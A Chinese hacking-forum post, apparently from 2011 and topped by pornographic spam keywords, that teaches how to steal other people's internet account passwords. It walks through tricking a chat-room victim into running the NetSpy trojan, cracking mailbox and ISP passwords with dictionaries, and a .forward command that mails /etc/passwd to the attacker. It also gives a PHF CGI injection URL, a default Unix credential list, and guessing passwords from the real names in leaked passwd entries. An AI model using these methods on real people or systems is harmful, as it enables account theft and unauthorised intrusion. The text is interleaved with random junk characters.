久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>

          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        2. 

          4. <th id="r7w9x"></th>
          1. 

            汶上信息港
            
標題: 如何得到別人的上網(wǎng)帳號和密碼 [打印本頁]
            

            
作者: 雜七雜八    時間: 2011-1-12 21:03
            
標題: 如何得到別人的上網(wǎng)帳號和密碼
            如何得到別人的上網(wǎng)帳號和密碼,我在這里介紹幾種弱智方法。. A% v$ b, C9 e0 n+ N
            
方案一:利用特洛伊木馬得到帳號。必備工具:NTESPY、PWLVIEW。
            
4 t0 P) C, w8 G) P: j優(yōu)點:只要對方運行了程序就有80%的成功率,而且不需要任何網(wǎng)絡(luò)入侵知識,只要能熟悉的操作上面兩個軟件即可。NETSPY是全中文軟件,一看就會。而PWLVIEW又是弱智操作只要在DOS下輸入PWLVIEW然后按回車即可。成功率高,操作簡單而且用不了多長時間是它最大的優(yōu)點,只是......
            
4 E: J# ~: e6 H7 x缺點:只有一個,那就是如何讓對方乖乖的運行你的程序。+ M1 |7 X& g! m- @
            
提示:先問清你的目標和你是不是在一個城市。
            
9 d- L/ P' G' i( {% {* \實戰(zhàn)演戲:一天,我在X海聊天室里尋找目標,遇見了同在北京的色鵝丟丟。我上前打招呼:丟丟好呀。丟丟說:你好呀。我又說:XXXXXXX(客套話,先和他拉關(guān)系)對了,我拿到了一個新程序,要不要看看?丟丟說:好呀,寄給我吧。
            
5 ~2 P! N& `- S* ~哈哈,魚上鉤了!先把誘餌程序改個名,如改成readme之類的東東,然后和一些不相干的東西發(fā)過去,然后你讓他先運行README。在這插一句,有一位大俠使用此法時,竟然把控制端程序和NETSPY的說明文件一起發(fā)了過去,真搞不懂他怎么想的。我對他說,你先運行README,是中文說明。丟丟說:好...咦,怎么沒反映呀?(YEAH!)我又說:那你直接運行軟件吧。丟丟說:好吧...不錯...我說:明天見...開始干活,連上他的機子后,現(xiàn)在C盤里找到了WIN95的目錄WINDOWS。也有可能是WIN95或WIN98,進入后查找*.pwl,然后把所有后綴名為PWL的文件都抓過來,放在你的工具PWLVIEW的子目錄里。在DOS窗口下輸入PWLVIEW然后敲回車,丟丟的上網(wǎng)帳號和密碼就都顯示出來了。而且以后如果他上網(wǎng),NETSPY就會通知你,他就再也逃不出你的手掌心了。就算是他換了密碼,你也能在2分鐘內(nèi)再把他搞定。. Y$ O9 c1 X  ^0 {7 v, w7 z3 k
            
忠告:你用他的帳號上網(wǎng)后第一件事就是先去查看他的上網(wǎng)時間。分析一下他一般幾點上網(wǎng)以避免撞車。& `  {3 L" s8 r- |' X" s0 i
            
方案二:利用ISP的疏忽做文章舉。例用工具:EMAILCRK或網(wǎng)絡(luò)刺客# s8 V6 O! {: H+ R% ^1 U) a
            
優(yōu)點:沒什么優(yōu)點
            
, |9 A4 _6 x, h: J$ A9 z缺點:要具體情況具體對待,太麻煩
            
* e' \7 V& ]/ e: V2 C* [& H, O提示:平時多多留神。6 P8 E- }/ I2 ~$ _$ r5 `: ~
            
譬如,某個ISP給你開好了帳號,然后又畫蛇添足的給你一個郵箱,地址是:你的帳號@xxx.net" d; a5 m% Q$ g2 R# Y( D' Z
            
密碼和你的上網(wǎng)密碼一樣。也就是說,只要你能敲開郵箱的密碼就一切OK了。
            
, o/ g9 b( M9 |& ^運行EMAILCRK或網(wǎng)絡(luò)刺客,套上字典后就等著。一般沒有XX個小時搞不定,不成功的可能性很大,而且破解時還必須要上網(wǎng)。你的機子要是快可以開上三四個窗口,套上不同的字典一起破9 X8 v9 \1 E8 G: c( t6 L( b
            
方案三:侵入郵局主機然后把PASS檔抓回來,然后用JOHN或JACK套上字典開始破。) K/ i! h6 S* P3 }0 D6 |& d7 Z: M# S, |
            
優(yōu)點:一次可以破出好多帳號,而且如果運氣好還能拿到ROOT,這個主機就要歸你控制了。而且破解時不用上網(wǎng),可以好幾臺機子一起破。' y4 t$ N+ l+ `. D/ K1 v- b3 i+ l
            
缺點:對于初學(xué)者有一定困難,尤其是只想拿一個上網(wǎng)帳號這樣做恐怕會得不償失。而且被發(fā)現(xiàn)的可能性很大,情節(jié)嚴重且性質(zhì)惡劣,一定要慎重對待。' j7 O9 z* V& Q/ P- C; r
            
由于介紹此類的教學(xué)文章比較多,我就不班門弄斧了。 
            
9 k6 F4 t* R) l, c6 F( p* w2 @* d" W: [7 k1 {/ d0 ?
            
哈哈,我來說說最簡單的入侵方法。其實入侵大體的原理相同,主要是利用系統(tǒng)的漏洞(BUG)來做文章。' _2 K7 f- d$ d/ `% d* `( q
            
只不過有的網(wǎng)站漏洞難找有的好找而已。一個好的黑客,就是要能很快的發(fā)現(xiàn)漏洞并加以利用。下面我給大家舉一個小栗子。6 s; K: m; L. }4 v# e# C
            
有一天,我去XX熱線申請主頁,發(fā)現(xiàn)那里采用的是機器自動回信,信的大概格式如下:
            
+ s% {1 I4 ]* W# P, H9 c! e" x$ V
            
------------------------------
            
2 K0 W7 [( L) Y* r
            
7 I! K. l3 _- O* ?: t  R, sXXX,你好(XX是你在表格上填的名字)
            
& E8 l7 b1 Z* g, O$ V你在XX熱線的主頁空間已開通
            
% u: Y+ W- K/ y帳戶名:XXX 密碼:118 T" ]6 Q, |$ E. T% d+ i
            
-----------XX熱線7 l* d$ G4 v+ s+ p; g/ b7 K
            
電話:XXXX-XXXXXXXX' G1 a& b3 G" c' M5 N) [9 F6 f
            
------------------------------+ i1 [5 G+ Z' p: a
            
1 w+ G4 d& K" F8 n# x
            
好了,由于是機器回信,所以那里所有人的初始密碼都是11,而且該熱線要更改密碼要TELNET到郵局主機去改,有許多網(wǎng)友并沒有接觸過如何T主機,所以他們使用的還是初始密碼11。
            
: k7 s1 L) k3 P! \開始干活了,打開FTP軟件,輸入XX熱線的IP,密碼11,然后挨個輸入帳戶名。帳戶名可去XX熱線的主頁空間列表里查看,先試試AAAA,。。。沒成功,再換一個,AABB。。。還是不行。哈哈,這個用戶名短,沒準能行。輸入AA。。。進去了。寄下用戶名然后繼續(xù)試,ABC。。。又成功了,看來沒改密碼的人很多呀。試幾個就行了,現(xiàn)在,你已經(jīng)擁有這些帳戶的控制權(quán)了。
            
8 R" W3 P5 i9 x' M' A上面的這個栗子很簡單,一般象這么大的漏很難找。要侵入一個稍微象點話的站臺就要耗費你大量的時間和金錢,而且還未必能成功。即使成功了,你不改它實在無趣,改了恐怕會步馬X的后塵。此人侵入貴陽的主機并把界面換成了一張淫穢圖片。害的自己吃飯不用花錢了。所以我在這里勸大家一句,把這方面的精力放到全心全意為人民服務(wù)上去。實在不行就去聊天室,看誰不聽話就炸他,同樣很過癮的!
            
. F, B; j* C, @& K' D  5 c. D0 s2 \' R) K
            
$ N$ n' J. ]9 m1 {" J1 [
            
                           如何獲得第一個帳號: N4 \9 ]. G5 a9 h- |( ^
            
0 j2 J& N( a0 k1 ^+ h
            
我們這種水平不高的黑客入侵都是先得到系統(tǒng)的一個有效帳號,進入后再利用系統(tǒng)BUG得到ROOT權(quán)限或想辦法得到SHADOW再解密.無論是利用系統(tǒng)漏洞還是得到SHADOW都是有一定規(guī)律可尋的,通常你到一些黑客站點找到對應(yīng)系統(tǒng)相應(yīng)版本的EXPLOIT編譯后執(zhí)行就行了.我感覺最困難的是獲得第一個有效的帳號,有時侯費盡力氣也得不到,后來總算是積累了一些經(jīng)驗,想寫出來和大家交流一下,希望能拋磚引玉,請高手們把更好的方法告訴我.
            
: k2 m9 d  ?1 _- d: L+ F) n% i% C! X
            
確定了目標以后,我通常是先用匿名FTP去看一下,許多網(wǎng)站都開匿名FTP,帳號用ANONYMOUS或是FTP,密碼用一個EMAIL帳號(當然是假的),進入后到/etc目錄下把PASSWD拿回來,一般情況下都是一份很不全的名單,只有幾個系統(tǒng)帳號,那就算白來了:-}但有的時候會有比較傻的管理員把一些普通帳號放進去,這就是很重要的信息,雖然只有帳號沒有密碼,但畢竟邁出了第一步.如果FTP主目錄是drwxr-xr-x,做一個.foward文件傳上去,在UNIX下的命令應(yīng)該是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后給匿名用戶寫一封信,它會把PASSWD發(fā)給你。! M: ]1 C6 ?; U! H/ C
            

            
' c9 \3 o; \) H4 p7 q如果目標沒有匿名FTP,就通過WWW訪問它的主頁,看看上面有什么信息,例如通過一些聯(lián)系人的EMAIL你就可以發(fā)現(xiàn)一些帳號,有的網(wǎng)頁上甚至列出了EMAIL通訊錄,這對黑客來講就是無價之寶.把這些帳號記下來,非常有用.
            
3 d. Y, k) _3 m
            
% P' I1 D% k" ?6 _4 E以上幾個方法都不行的話,那就試試PHF查詢.在瀏覽器的地址欄輸入http://攻擊目標/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的話會顯示出PASSWD來,但是成功率極低:-< 3 k/ S" J# L8 s2 M8 c& X
            

            
4 M, v; |2 ^/ Z* q$ X; E還可以利用目標的FINGER功能來積累帳號,如利用HAKTEK(一種掃描器)來監(jiān)視目標,一旦有人登陸該主機就會報告給你.但這種方法的缺點就是浪費時間,如果你是自己花錢上網(wǎng)的話可就要出血了!9 l9 x# v. Z$ v
            
6 f/ @) Q' Y8 ^
            
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系統(tǒng)默認的帳號,例如:
            
+ s6 d9 x6 H. v4 z4 p: E  R
            
. N, s) C' O3 M帳號     密碼
            
7 Q2 p% U% W# J2 A0 T----------- ----------------
            
  U+ n/ V: u, Froot    root
            
: N' E/ Z& T& k. P, Ssys     sys/system/bin
            
  z: X0 |( U) F# G& obin     sys/bin' V. c% {8 S# w3 `8 L
            
mountfsys  mountfsys2 K( O# W* ~1 U' N2 Q. h
            
adm     adm
            
( [6 b. m1 H7 p) ~0 q7 |9 Muucp    uucp
            
* T+ a/ n, Q# f3 u  znuucp    anon
            
' J6 ^# ~/ j6 j9 p8 y, d6 Panon    anon5 y0 X. P7 h" j. s$ u
            
user    user/ h' D  \0 ]0 g1 }
            
games    games" k% m; y( q9 R' Y( k# I- B
            
install   install% H; n2 x! V4 A, i1 d
            
reboot   給 "command login" 用的- x( H- P/ Q. S% |  C, _$ c; c
            
demo    demo) N5 U4 A: j, G% u
            
umountfsys umountfsys# B+ y1 ?% l6 E$ d8 l
            
sync     sync
            
% e$ x: Q" b, Wadmin    admin
            
& T1 a. T' m6 E* Rguest    guest
            
2 u) W% W$ H/ x6 H; u. x' idaemon   daemon" y0 k+ N% h( d- B* b9 r1 J
            
________________________________________________________________
            
4 _$ q- A. V7 W: g$ l" i. h! i1 x6 e. {; y2 R
            
有些管理員忘記把他們改掉,那你就發(fā)財了!
            
0 B$ C9 a- i( A' w. g0 x& T  `3 K7 \
            
另外還有一些習(xí)慣性帳號如:test,www,html,web,oracle,setup,sybase,john,tom等也都應(yīng)該試一試.$ s8 o+ N5 R8 C+ A, x5 ^
            
8 j! A( S  N3 b* T
            
只有帳號還不能進入系統(tǒng),但有了帳號搞密碼就容易一些了,主要辦法還是猜.如果是通過PASSWD知道帳號的那你應(yīng)該會發(fā)現(xiàn)該用戶的許多信息,例如:% W# J  K. T3 q+ {- n
            

            
, Y) m0 `+ t3 }4 W: X.........) B  E! g: ^/ ?& T: _- l2 ?1 Z
            

            
3 [! a) N  V! T/ Cxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh# ~7 H- {  `" O: D+ m
            
0 C+ J) j3 R0 G3 J! `1 d' @' L3 s  E, m
            
qingyuan:x:275:50::/usr/qingyuan:/bin/sh
            
. s- Q0 ?; A, K
            
$ {: k4 L5 m5 G& J' X' h+ G' ehjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh" W! w& ]  S) f/ S1 p& `4 b
            
( b" V: ]2 @9 N( J
            
smlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
            
+ t) j3 h+ p) X9 r/ t/ L9 a0 i
            
. W( W5 g+ o% J8 {4 V: k) vkyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh
            
! {! H$ A  q- W* ?3 l; C
            
: M9 d( s0 R( D( q7 Fbrlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh) l, x2 ^6 ?3 n" f; d8 a$ j5 [' |
            
/ B% A6 L: n, m9 u% @" Q; z
            
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh8 C- ]4 `* h' c
            

            
) _2 O% O2 c0 e, h; z! p* |............( s& R) G+ c  d/ f
            
' G6 S) o2 @0 \  a4 j/ q
            
這是一部分PASSWD,從這兒我們可以得到七個帳號,注意每一行的第五項,那是該用戶的真實姓名,對!就用它來做密碼試.成功率還是比較高的.1 v8 N" I' p- @5 C0 r% C. \/ v
            

            
! n1 l+ @6 G) X/ l6 B, g3 F如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜">如果是用其他方法獲得帳號的,就用FINGER查詢來獲得相關(guān)信息.例如知道一個帳號support,我們就用網(wǎng)絡(luò)刺客II里的FINGER項來偵察support@xxx.xxx.xxx會獲得很多該帳號的信息例如真名實姓,電話號碼等就用這些做密碼來猜.8 K. \: k- N5 {( l
            
6 u0 v8 F$ o& b
            
當然最可能的密碼還是帳號本身和一些帳號的變形,如帳號是john,密碼可能是nhoj,john123,john888等.或是一些簡單數(shù)字.總之是要費一番工夫來猜的.
            
& S+ b* q3 b' |- P! u& U; J$ F$ v9 @5 l4 U" A
            
如果還猜不出密碼,只好用LETMEIN之類的東西來猜,字典一定要好.否則,你的電話費就要.....而且這種方法比較危險,還是不用為好.6 j$ V0 v8 |2 X9 {8 t
            

            
, G$ o( v$ ^1 [& @7 Z( }最后實在不行還有一種比較卑劣的手段,就是給該網(wǎng)站的網(wǎng)管寫封信,想辦法騙他執(zhí)行特洛伊木馬,然后再.......算了,不說了.6 f  m+ d+ S5 x/ }! C% p
            
$ I: ?; V# N! @- K: U9 ?
            
你可能發(fā)現(xiàn)以上這些方法都不能百分之百的成功,或者說成功率是比較低的,因為我也不知道更好的方法.但我感到一定有一種更好的方法,希望有高手見到此文能告訴我.2 ~+ S2 `2 D' q- a/ @
            

            
2 i9 m5 h+ {/ V$ |" }




            

            

            歡迎光臨 汶上信息港 (http://m.junkejituan.com/)

Powered by Discuz! X3.5